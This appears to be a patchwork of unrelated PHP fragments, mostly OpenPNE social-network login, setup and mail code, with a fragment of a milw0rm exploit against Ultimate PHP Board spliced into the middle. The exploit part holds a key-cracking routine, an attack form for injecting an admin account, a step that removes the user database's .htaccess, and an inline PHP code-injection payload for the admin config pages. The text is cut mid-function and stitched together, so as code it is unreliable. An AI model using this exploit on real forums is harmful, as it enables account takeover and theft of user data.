function execute($requests)
{
$errors = array();
if (!db_common_is_mailaddress($requests['pc_address']) || is_ktai_mail_address($requests['pc_address'])) {
$errors[] = 'PCメールアドレスを正しく入力してください';
}
if (OPENPNE_AUTH_MODE == 'email') {
if ($requests['password'] !== $requests['password2']) {
$errors[] = 'パスワードが一致していません';
}
}
if ($requests['admin_password'] !== $requests['admin_password2']) {
$errors[] = '管理用パスワードが一致していません';
}
if (OPENPNE_AUTH_MODE == 'slavepne') {
$auth_config = get_auth_config(false);
$storage = Auth::_factory($auth_config['storage'], $auth_config['options']);
$result = $storage->fetchData($requests['username'], $requests['password'], false);
if ($result !== true) {
$errors[] = 'ログインIDまたはパスワードが一致しません';
}
}
if (OPENPNE_AUTH_MODE == 'pneid') {
if (is_null($requests['username']) || $requests['username'] === '') {
$errors[] = 'ログインIDを入力してください';
} elseif (!preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\\-_]+[a-zA-Z0-9]$/i', $requests['username'])) {
$errors[] = 'ログインIDは4~30文字の半角英数字、記号(アンダーバー「_」、ハイフン「-」)で入力してください';
} elseif (mb_strwidth($requests['username'], 'UTF-8') < 4) {
$errors[] = "ログインIDは半角4文字以上で入力してください";
} elseif (mb_strwidth($requests['username'], 'UTF-8') > 30) {
$errors[] = "ログインIDは半角30文字以内で入力してください";
}
}
if ($errors) {
$this->handleError($errors);
}
// c_admin_config: SNS_NAME
$data = array('name' => 'SNS_NAME', 'value' => $requests['SNS_NAME']);
db_insert('c_admin_config', $data);
// c_member_secure
$data = array('c_member_id' => 1, 'hashed_password' => md5($requests['password']), 'hashed_password_query_answer' => '', 'pc_address' => t_encrypt($requests['pc_address']), 'ktai_address' => '', 'regist_address' => t_encrypt($requests['pc_address']), 'easy_access_id' => '');
if (OPENPNE_AUTH_MODE == 'slavepne' && !IS_SLAVEPNE_EMAIL_REGIST) {
$data['ktai_address'] = t_encrypt('*****@*****.**');
}
db_insert('c_member_secure', $data);
// c_admin_user
$data = array('username' => $requests['admin_username'], 'password' => md5($requests['admin_password']), 'auth_type' => 'all');
db_insert('c_admin_user', $data);
if (OPENPNE_AUTH_MODE != 'email') {
db_member_insert_username(1, $requests['username']);
}
openpne_redirect('setup', 'page_setup_done');
}
/**
* Shibboleth login using setAuth
*
* @access public
* @return true/false
*/
public function login($is_save_cookie = false, $is_encrypt_username = false)
{
$this->auth =& $this->factory(true);
$address = $this->get_attribute();
// Login fail if essential attribute is empty.
if (!$address) {
return false;
}
if (!IS_SLAVEPNE) {
// IS_SLAVEPNE is false on Shibboleth
if ($is_encrypt_username) {
$this->auth->post[$this->auth->_postUsername] = t_encrypt($address);
}
}
// Is $address existing?
if (db_member_c_member_id4pc_address($address)) {
$this->auth->setAuth($this->auth->post[$this->auth->_postUsername]);
if (OPENPNE_SESSION_CHECK_URL) {
$this->auth->setAuthData('OPENPNE_URL', OPENPNE_URL);
}
$this->sess_id = session_id();
if ($is_save_cookie) {
$expire = time() + 2592000;
} else {
$expire = 0;
}
// Shibboleth don't consider the ktai, because $this->ktai is false.
setcookie(session_name(), session_id(), $expire, $this->cookie_path);
$this->adjust_cookie();
return true;
} else {
if (OPENPNE_SHIB_AUTO_REGIST) {
$this->register_user($address);
}
return false;
}
}
function do_common_send_mail_c_commu_admin_change($c_member_id_to, $c_commu_id)
{
$c_member_to = $c_member = db_member_c_member4c_member_id($c_member_id_to, true);
$c_commu = db_commu_c_commu4c_commu_id($c_commu_id);
$to_address = '';
$params = array('c_member_to' => $c_member_to, 'c_commu' => $c_commu);
if (!empty($c_member_to['secure']['pc_address'])) {
$to_address = $c_member_to['secure']['pc_address'];
return fetch_send_mail($to_address, 'm_pc_c_commu_admin_change', $params);
} else {
$p = array('kad' => t_encrypt(db_member_username4c_member_id($c_member['c_member_id'], true)));
$params['login_url'] = openpne_gen_url('ktai', 'page_o_login', $p);
$to_address = $c_member_to['secure']['ktai_address'];
return fetch_send_mail($to_address, 'm_ktai_c_commu_admin_change', $params);
}
}
function execute($requests)
{
if (!($c_member_id = db_member_c_member_id4easy_access_id(OpenPNE_KtaiID::getID()))) {
// 認証エラー
$p = array('msg' => 14, 'kad' => t_encrypt($requests['ktai_address']), 'login_params' => $requests['login_params']);
openpne_redirect('ktai', 'page_o_login', $p);
}
$c_member = db_member_c_member4c_member_id($c_member_id, true);
@session_name('OpenPNEktai');
$config = get_auth_config(true);
$auth = new OpenPNE_Auth($config);
$auth->setExpire($GLOBALS['OpenPNE']['ktai']['session_lifetime']);
$auth->setIdle($GLOBALS['OpenPNE']['ktai']['session_idletime']);
$this->_auth =& $auth;
if (LOGIN_CHECK_ENABLE) {
// 不正ログインチェック
include_once 'OpenPNE/LoginChecker.php';
$options = array('check_num' => LOGIN_CHECK_NUM, 'check_time' => LOGIN_CHECK_TIME, 'reject_time' => LOGIN_REJECT_TIME);
$lc = new OpenPNE_LoginChecker($options);
if ($lc->is_rejected()) {
// 認証エラー
$lc->fail_login();
$p = array('msg' => '0', 'login_params' => $requests['login_params']);
openpne_redirect('ktai', 'page_o_login', $p);
}
}
$auth->auth =& $auth->factory(true);
$username = db_member_username4c_member_id($c_member_id, true);
if (OPENPNE_AUTH_MODE == 'email') {
$username = t_encrypt($username);
}
$auth->auth->setAuth($username);
$auth->auth->setAuthData('OPENPNE_URL', OPENPNE_URL);
$auth->auth->setAuthData('USER_AGENT', $_SERVER['HTTP_USER_AGENT']);
if (OPENPNE_ONE_SESSION_PER_USER) {
db_member_update_c_member_secure_insert_sess_id($c_member_id, session_id());
}
if (db_member_is_login_rejected($c_member_id)) {
ktai_display_error('ログインできませんでした。');
}
if (db_member_is_blacklist($c_member_id)) {
ktai_display_error('ログインできませんでした。');
}
db_member_do_access($c_member_id);
// ログイン後のリダイレクト先を決定する
$a = '';
$m = 'ktai';
$p = array();
if ($requests['login_params']) {
parse_str($requests['login_params'], $p);
}
if (!empty($p['a'])) {
$a = $p['a'];
}
if (!empty($p['m'])) {
$m = $p['m'];
}
if ($m == 'ktai' && $a == 'page_o_login') {
$a = '';
}
$_SESSION['c_member_id'] = $c_member_id;
$p['ksid'] = session_id();
openpne_redirect($m, $a, $p);
}
# OPENPNE_DIR/bin/tool_create_member.php
# cd OPENPNE_DIR/bin/
# php tool_create_member.php
require_once './config.inc.php';
require_once OPENPNE_WEBAPP_DIR . '/init.inc';
print "start\n";
$want_member_num = 380000;
$db =& db_get_instance();
$matome_num = 1000;
for ($i = 0; $i < $want_member_num; $i += $matome_num) {
$sql = "INSERT INTO `c_member` (c_member_id, nickname, birth_year, birth_day, c_password_query_id, c_member_id_invite, is_receive_mail, is_receive_ktai_mail, is_receive_daily_news, public_flag_birth_year, public_flag_birth_month_day) VALUES ";
$sql2 = "INSERT INTO `c_member_secure` (c_member_id, hashed_password, pc_address, regist_address) VALUES ";
$is_first = true;
for ($j = 0; $j < $matome_num; $j++) {
if ($is_first == true) {
$is_first = false;
} else {
$sql .= ",";
$sql2 .= ",";
}
$member_id = 1 + ($i + $j);
$sql .= '(' . $member_id . ',"hoge",2001,10,10,0,1,1,1,"public","public")';
$pc_address = t_encrypt("sns" . $member_id . "@example.com");
$regist_address = t_encrypt("sns" . $member_id . "@example.com");
$sql2 .= '(' . $member_id . ',md5("pohigepoihge"),"' . $pc_address . '","' . $regist_address . '")';
}
$result = $db->query($sql);
$result = $db->query($sql2);
print $i . ",";
}
print "end\n";
/**
* スケジュール通知メールを送信する
*/
function biz_do_common_send_schedule_mail()
{
$y = date("Y");
$m = date("m");
$d = date("d");
$c_schedule_list = biz_getDateSchedule($y, $m, $d);
$send_list = array();
foreach ($c_schedule_list as $schedule_id) {
$value = biz_getScheduleInfo($schedule_id);
$biz_schedule_member = biz_getJoinIdSchedule($value['biz_schedule_id']);
foreach ($biz_schedule_member as $c_member_id) {
$send_list[$c_member_id][] = $value;
}
}
foreach ($send_list as $c_member_id => $c_schedule_list) {
$c_member_secure = db_member_c_member_secure4c_member_id($c_member_id);
if (!empty($c_member_secure['pc_address'])) {
// PCメールアドレスがある場合は、PCのみ送信
$pc_address = $c_member_secure['pc_address'];
$params = array('c_member' => db_member_c_member4c_member_id_LIGHT($c_member_id), 'c_schedule_list' => $c_schedule_list);
fetch_send_mail($pc_address, 'm_pc_schedule_mail', $params);
} else {
// PCメールアドレスがない場合は、携帯のみ送信
$ktai_address = $c_member_secure['ktai_address'];
$p = array('kad' => t_encrypt(db_member_username4c_member_id($c_member_id, true)));
$login_url = openpne_gen_url('ktai', 'page_o_login', $p);
$params = array('c_member' => db_member_c_member4c_member_id_LIGHT($c_member_id), 'login_url' => $login_url, 'c_schedule_list' => $c_schedule_list);
fetch_send_mail($ktai_address, 'm_ktai_schedule_mail', $params);
}
}
}
if (isset($_REQUEST['cypher']) && isset($_REQUEST['plain'])) {
$cypher_len = strlen($_REQUEST['cypher']);
$offset = gen_offset($_REQUEST['cypher'], $_REQUEST['plain']);
print "Offset:";
for ($x = 0; $x < $cypher_len; $x++) {
print $offset[$x] . ':';
}
print '<br>';
$validKeys = 0;
$y = 0;
for ($y = 255; $y >= 0; $y--) {
$newKey[$y] = gen_collision($offset, $y);
$key_len = strlen($newKey[$y]);
print "<br>Key:{$y} = ";
for ($x = 0; $x <= $key_len; $x++) {
print $newKey[$y][$x];
}
print "<br>Cypher:" . t_encrypt($_REQUEST['plain'], $newKey[$y]);
print "<br>Plain :" . t_decrypt($_REQUEST['cypher'], $newKey[$y]) . "<br><br>";
}
exit;
}
}
}
}
}
print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>\n \n <CENTER><B><I>0-day</I></B></CENTER>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Get Admin</I></B><br>\n <B>Inject an administrative account into UPB:</B>\n <p>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>\n <input name=\"addVict\" type=\"text\" size=60> <br>\n Inject Name:<br>\n <input name=\"addName\" type=\"text\" size=60> <br>\n Inject Password:<br>\n <input name=\"addPass\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Inject Admin\"> \n </form>\n \n <p>\n <B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B>\n <p> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Gain Read Access To The Database</I></B>\n\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br>\n <input name=\"victHTA\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Crypto</I></B> \n\t\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text Password:<br>\n <input name=\"encrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Encrypt\"> \n </form>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n Encrypted Password:<br>\n <input name=\"decrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Decrypt\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> \n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text:<br>\n <input name=\"plain\" type=\"text\" size=60> <br>\n <p> \n corosponding cypher text:<br>\n <input name=\"cypher\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"crack key\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n perl CGI Code Injection Attack Remote Target:<br>\n <input name=\"vict\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form>\n \n <B>http://www.domain.ext/PathToUPB (no trailing slash)</B>\n </body>";
?>
# milw0rm.com [2006-06-20]
/**
* リクエストからログイン処理をおこなう
*
* @param bool $is_save_cookie クッキーの保存期限を設定するかどうか
* @return bool
*/
function login($is_save_cookie = false)
{
$this->auth =& $this->factory(true);
if ($this->is_lowercase_username) {
$this->auth->post[$this->auth->_postUsername] = strtolower($this->auth->post[$this->auth->_postUsername]);
}
if ($this->is_encrypt_username) {
$this->auth->post[$this->auth->_postUsername] = t_encrypt($this->auth->post[$this->auth->_postUsername]);
}
$this->auth->start();
if ($this->auth->getAuth()) {
if (OPENPNE_SESSION_CHECK_URL) {
$this->auth->setAuthData('OPENPNE_URL', OPENPNE_URL);
}
if ($this->is_check_user_agent) {
$this->auth->setAuthData('USER_AGENT', $_SERVER['HTTP_USER_AGENT']);
}
$this->sess_id = session_id();
if (!$this->is_ktai) {
if ($is_save_cookie) {
$expire = time() + 2592000;
// 30 days
} else {
$expire = 0;
}
setcookie(session_name(), session_id(), $expire, $this->cookie_path);
}
return true;
} else {
return false;
}
}
function execute($requests)
{
// --- リクエスト変数
$ses = $requests['ses'];
$password = $requests['password'];
// ----------
// セッションが有効かどうか
if (!($pre = db_member_c_ktai_address_pre4session($ses))) {
// 無効の場合、login へリダイレクト
openpne_redirect('ktai', 'page_o_login');
}
// メールアドレスが登録できるかどうか
if (!util_is_regist_mail_address($pre['ktai_address'], $pre['c_member_id'])) {
openpne_redirect('ktai', 'page_o_login', array('msg' => 42));
}
$c_member_id = $pre['c_member_id'];
$ktai_address = $pre['ktai_address'];
// パスワードチェック
if (!db_common_authenticate_password($c_member_id, $password, true)) {
$p = array('msg' => 18, 'ses' => $ses);
openpne_redirect('ktai', 'page_o_login2', $p);
}
if (IS_GET_EASY_ACCESS_ID == 2 || IS_GET_EASY_ACCESS_ID == 3) {
// 携帯の個体識別番号の取得が必須
if (!($easy_access_id = OpenPNE_KtaiID::getID())) {
// 携帯の個体識別番号を取得できませんでした
$p = array('msg' => 27, 'ses' => $ses);
openpne_redirect('ktai', 'page_o_login2', $p);
} else {
$id = db_member_c_member_id4easy_access_id($easy_access_id);
if ($id && $c_member_id != $id) {
$p = array('msg' => 39, 'ses' => $ses);
openpne_redirect('ktai', 'page_o_login2', $p);
}
if (db_member_easy_access_id_is_blacklist(md5($easy_access_id))) {
ktai_display_error('携帯メールアドレスを登録できませんでした。');
}
// update
db_member_update_easy_access_id($c_member_id, $easy_access_id);
db_member_update_ktai_address($c_member_id, $ktai_address);
db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']);
openpne_redirect('ktai', 'do_o_easy_login');
}
} else {
if (IS_GET_EASY_ACCESS_ID == 1) {
// 携帯の個体識別番号の取得が任意
if ($easy_access_id = OpenPNE_KtaiID::getID()) {
$id = db_member_c_member_id4easy_access_id($easy_access_id);
if ($id && $c_member_id != $id) {
$p = array('msg' => 39, 'ses' => $ses);
openpne_redirect('ktai', 'page_o_login2', $p);
}
if (db_member_easy_access_id_is_blacklist(md5($easy_access_id))) {
ktai_display_error('携帯メールアドレスを登録できませんでした。');
}
// update
db_member_update_easy_access_id($c_member_id, $easy_access_id);
db_member_update_ktai_address($c_member_id, $ktai_address);
db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']);
openpne_redirect('ktai', 'do_o_easy_login');
}
}
}
// 携帯の個体識別番号を取得しない
db_member_update_ktai_address($c_member_id, $ktai_address);
db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']);
// login ページへリダイレクト
$p = array('msg' => 19, 'kad' => t_encrypt(db_member_username4c_member_id($c_member_id, true)));
openpne_redirect('ktai', 'page_o_login', $p);
}
function execute($requests)
{
// --- リクエスト変数
$c_member_id = $requests['c_member_id'];
$ktai_address = $requests['ktai_address'];
$password = $requests['password'];
// ----------
@session_name('OpenPNEktai');
$config = get_auth_config(true);
$auth = new OpenPNE_Auth($config);
$auth->setExpire($GLOBALS['OpenPNE']['ktai']['session_lifetime']);
$auth->setIdle($GLOBALS['OpenPNE']['ktai']['session_idletime']);
$this->_auth =& $auth;
if (LOGIN_CHECK_ENABLE) {
// 不正ログインチェック
include_once 'OpenPNE/LoginChecker.php';
$options = array('check_num' => LOGIN_CHECK_NUM, 'check_time' => LOGIN_CHECK_TIME, 'reject_time' => LOGIN_REJECT_TIME);
$lc = new OpenPNE_LoginChecker($options);
if ($lc->is_rejected() || !$auth->login()) {
// 認証エラー
$lc->fail_login();
$p = array('msg' => '0', 'kad' => t_encrypt($ktai_address), 'login_params' => $requests['login_params']);
openpne_redirect('ktai', 'page_o_login', $p);
}
} else {
if (!$auth->login()) {
$p = array('msg' => '0', 'kad' => t_encrypt($ktai_address), 'login_params' => $requests['login_params']);
openpne_redirect('ktai', 'page_o_login', $p);
}
}
$c_member_id = db_member_c_member_id4username_encrypted($auth->getUsername(), true);
if (OPENPNE_AUTH_MODE == 'slavepne' && !$c_member_id) {
$c_member_id = db_member_create_member($_POST['username']);
}
if (!$c_member_id) {
$p = array('msg' => '0', 'kad' => t_encrypt($ktai_address), 'login_params' => $requests['login_params']);
openpne_redirect('ktai', 'page_o_login', $p);
}
if (OPENPNE_ONE_SESSION_PER_USER) {
db_member_update_c_member_secure_insert_sess_id($c_member_id, session_id());
}
if (db_member_is_login_rejected($c_member_id)) {
ktai_display_error('ログインできませんでした。');
}
if (db_member_is_blacklist($c_member_id)) {
ktai_display_error('ログインできませんでした。');
}
db_member_do_access($c_member_id);
// ログイン後のリダイレクト先を決定する
$a = '';
$m = 'ktai';
$p = array();
if ($requests['login_params']) {
parse_str($requests['login_params'], $p);
}
if (!empty($p['a'])) {
$a = $p['a'];
}
if (!empty($p['m'])) {
$m = $p['m'];
}
if ($m == 'ktai' && $a == 'page_o_login') {
$a = '';
}
$_SESSION['c_member_id'] = $c_member_id;
$p['ksid'] = session_id();
openpne_redirect($m, $a, $p);
}
function do_admin_send_message_mail_send_ktai($c_member_id_to, $c_member_id_from, $subject, $body)
{
$c_member_to = db_member_c_member4c_member_id($c_member_id_to, true);
$ktai_address = $c_member_to['secure']['ktai_address'];
$is_receive_ktai_mail = $c_member_to['is_receive_ktai_mail'];
$p = array('kad' => t_encrypt(db_member_username4c_member_id($c_member_to['c_member_id'], true)));
$login_url = openpne_gen_url('ktai', 'page_o_login', $p);
$params = array('c_member_to' => db_member_c_member4c_member_id($c_member_id_to), 'c_member_from' => db_member_c_member4c_member_id($c_member_id_from), 'login_url' => $login_url, 'subject' => $subject, 'body' => $body);
return admin_fetch_send_mail($ktai_address, 'm_ktai_message_zyushin', $params, $is_receive_ktai_mail);
}
/**
* ログインしたメンバーの情報が存在しない場合自動で生成
*/
function db_member_create_member($username)
{
$data = array('nickname' => 'NO NAME', 'birth_year' => 0, 'birth_month' => 0, 'birth_day' => 0, 'public_flag_birth_year' => 'public', 'public_flag_birth_month_day' => 'public', 'c_member_id_invite' => 1, 'c_password_query_id' => 0, 'is_receive_mail' => true, 'is_receive_ktai_mail' => true, 'is_receive_daily_news' => true, 'r_date' => db_now(), 'u_datetime' => db_now(), 'image_filename' => '', 'image_filename_1' => '', 'image_filename_2' => '', 'image_filename_3' => '', 'rss' => '');
$c_member_id = db_insert('c_member', $data);
if (!$c_member_id) {
return false;
}
$data = array('c_member_id' => intval($c_member_id), 'hashed_password' => "", 'hashed_password_query_answer' => "", 'pc_address' => "", 'ktai_address' => "", 'regist_address' => "", 'easy_access_id' => '');
if (!IS_SLAVEPNE_EMAIL_REGIST) {
$data['pc_address'] = t_encrypt($c_member_id . '@pc.example.com');
$data['ktai_address'] = t_encrypt($c_member_id . '@ktai.example.com');
}
if (!db_insert('c_member_secure', $data)) {
$sql = 'DELETE FROM c_member WHERE c_member_id = ?';
db_query($sql, array($c_member_id));
return false;
}
$data = array('c_member_id' => intval($c_member_id), 'username' => $username);
if (!db_insert('c_username', $data)) {
$sql = 'DELETE FROM c_member WHERE c_member_id = ?';
db_query($sql, array($c_member_id));
$sql = 'DELETE FROM c_member_secure WHERE c_member_id = ?';
db_query($sql, array($c_member_id));
return false;
}
return $c_member_id;
}
